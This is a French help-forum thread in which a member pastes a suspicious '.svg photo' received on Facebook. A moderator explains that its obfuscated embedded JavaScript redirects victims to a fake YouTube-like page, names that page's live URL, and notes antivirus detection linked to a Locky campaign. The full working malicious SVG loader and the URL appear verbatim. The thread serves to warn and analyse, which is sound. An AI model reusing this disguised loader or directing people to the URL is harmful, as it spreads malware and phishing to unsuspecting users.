Script java recu sur Facebook ! [Résolu/Fermé]

Signaler
Messages postés
123
Date d'inscription
dimanche 12 janvier 2014
Statut
Membre
Dernière intervention
16 mai 2017
-
Messages postés
123
Date d'inscription
dimanche 12 janvier 2014
Statut
Membre
Dernière intervention
16 mai 2017
-
Salut tout le monde, j'ai une question !

On m'as envoyé un script sur Facebook ce faisant passé pour une photos. Etant donné que je connais un peut l'informatique j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg j'ai donc ouvert avec Notepad et je suis tomber sur ce script :

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "[http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd%22>
<svg http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg] version="1.1" xmlns="[http://www.w3.org/2000/svg%22> http://www.w3.org/2000/svg">]  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function jzaehxu(lslzqi,dszrj,ztmdf){
      var zdvsmv = "./JHU_SrnVmFZxljy8:d2Y=k3h?CcMbfoaED65zIONK7gPTpLusXBvt0iAR94G1e";
      var rcqlrb = ["OH\/kPZRAU0z3u=heGcELI4B:67TNgtCK58noXS.jmlFy?VvprDbJ1i9_YfaxMd2s",".LKoClD2zOV0xrHkgIhymN?pP1neEGa7:fut_cd\/6SXF=4R9TUMJ5A3bjvZYi8sB","g\/6XIbuf=15eGPvKHF_9saixjC?2rZL:zyJAt0Vhc3OmN.k84Bpn7RoEMDUTdlYS","ko_A1LE6KNS903Te.JbuV27\/pHljYxdZX4RtgmiM8PDc?zvBaIFyns5fh:GCU=Or","XH7x3bYcCiD5g8E.pGeUIavmRZ6VBOkL9KyrS\/=MTJd_1ton0:PjFuN4zA2sf?lh","4M2z_U:eSiJIxP16avjmkL=.s3tlZbDp\/V5?FEO09dgHTfrXBoKGAy7CcRYunhN8","oYui.a3VAcSF5Ed4pt:6nKOR\/e?_HfUN7sbMr9lXLCx8PyIhg0=ZJTG1Bjz2Dkvm","fo:gyRJVjh=eU_sBXZaSTPD5EtA8L\/0m2G1cIF64xvn7r9pYNbl?.3MKzuiHdOkC","verIn5GYVdoK1HA96\/hazRp7:cELUub02PDMTCJ4xOmNgBF3_y8.i=Xsftk?jZSl"];
      var dbtli = "";
      var dhonon = 0;
      while(rcqlrb[dhonon]){
        dhonon++;
      }
      var ucscy = 0;
      while(lslzqi[ucscy]){
        var stoum = 0;
        var mrdfz = -1;
        while(zdvsmv[stoum]){
          if(zdvsmv[stoum] == lslzqi[ucscy]){
            mrdfz = stoum;
            break;
          }
          stoum++;
        }
        if(mrdfz >= 0){
          var wdmdam = 0;
          var vadtty = -1;
          while(rcqlrb[ucscy%dhonon][wdmdam]){
            if(rcqlrb[ucscy%dhonon][wdmdam] == lslzqi[ucscy]){
              vadtty = wdmdam;
              break;
            }
          wdmdam++;
          }
          dbtli += zdvsmv[vadtty];
        }else{
          dbtli += lslzqi[ucscy];
        }
        ucscy++;
      }
      var mhmisv = "";
      for(acaod=dszrj;acaod<dbtli.length;acaod++){
        mhmisv += dbtli[acaod];
      }
      dbtli = mhmisv;
      return dbtli;
    }
  var opree = window;
  var lukdy = jzaehxu("wwLicJs_Ai1R59X",12,false);
  var jjwun = jzaehxu("p1=3w17LP9jzK",5,false);
  var vsyhb = jzaehxu("w15/c/Vzc72SZ",9,false);
  opree[lukdy][jjwun][vsyhb] = jzaehxu("sHSs88eMXph/oc/Gb8sASiK4BMyp.8wHXeYe92BFN4ht3",6,true);
  ]]></script>
</svg>


Quelqu'un peut-il me dire ce qu'il exécute ? Merci ! :)

1 réponse

Messages postés
15967
Date d'inscription
samedi 31 mai 2008
Statut
Modérateur
Dernière intervention
3 août 2020
2 645
Bonjour,

"j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg"
Pourtant SVG est bien un format image valide : Scalable Vector Graphics

"j'ai donc ouvert avec Notepad et je suis tomber sur ce script"
Effectivement, SVG est un format qui peut se lire (et s'écrire) textuellement au format XML, ce qui ressemble bien à ce que tu nous montres. Et peux aussi exécuter du JavaScript lorsqu'il est lancé dans une page web.

Ton fichier est donc bien une image SVG tout à fait valide, qui dessine un rond rouge... En revanche, lorsque la partie JavaScript est exécutée ça redirige vers une page web, qui ressemble à YouTube (où je déconseillerais de trop s'attarder) http://orezupe.hav.pw/ucirepego.html

Plus d'info sur la manière dont fonctionne SVG, y compris sur sa partie JavaScript (qui n'a rien à voir avec Java) : https://www.alsacreations.com/tuto/lire/1421-svg-initiation-syntaxe-outils.html
La confiance n'exclut pas le contrôle
Messages postés
15967
Date d'inscription
samedi 31 mai 2008
Statut
Modérateur
Dernière intervention
3 août 2020
2 645
Bonjour,

Je reviens avec cet article d'information :

https://www.lci.fr/high-tech/un-nouveau-virus-locky-se-propage-sur-facebook-messenger-et-linkedin-voici-comment-eviter-de-vous-faire-pieger-2013860.html

Remarque : mon antivirus a été capable de repérer ce fichier comme dangereux et l'a placé en quarantaine (HTML/ExpKit.Gen2)

NB. je déplace ta discussion dans le forum Virus/Sécurité.
Messages postés
123
Date d'inscription
dimanche 12 janvier 2014
Statut
Membre
Dernière intervention
16 mai 2017

Merci de ton aide ! :)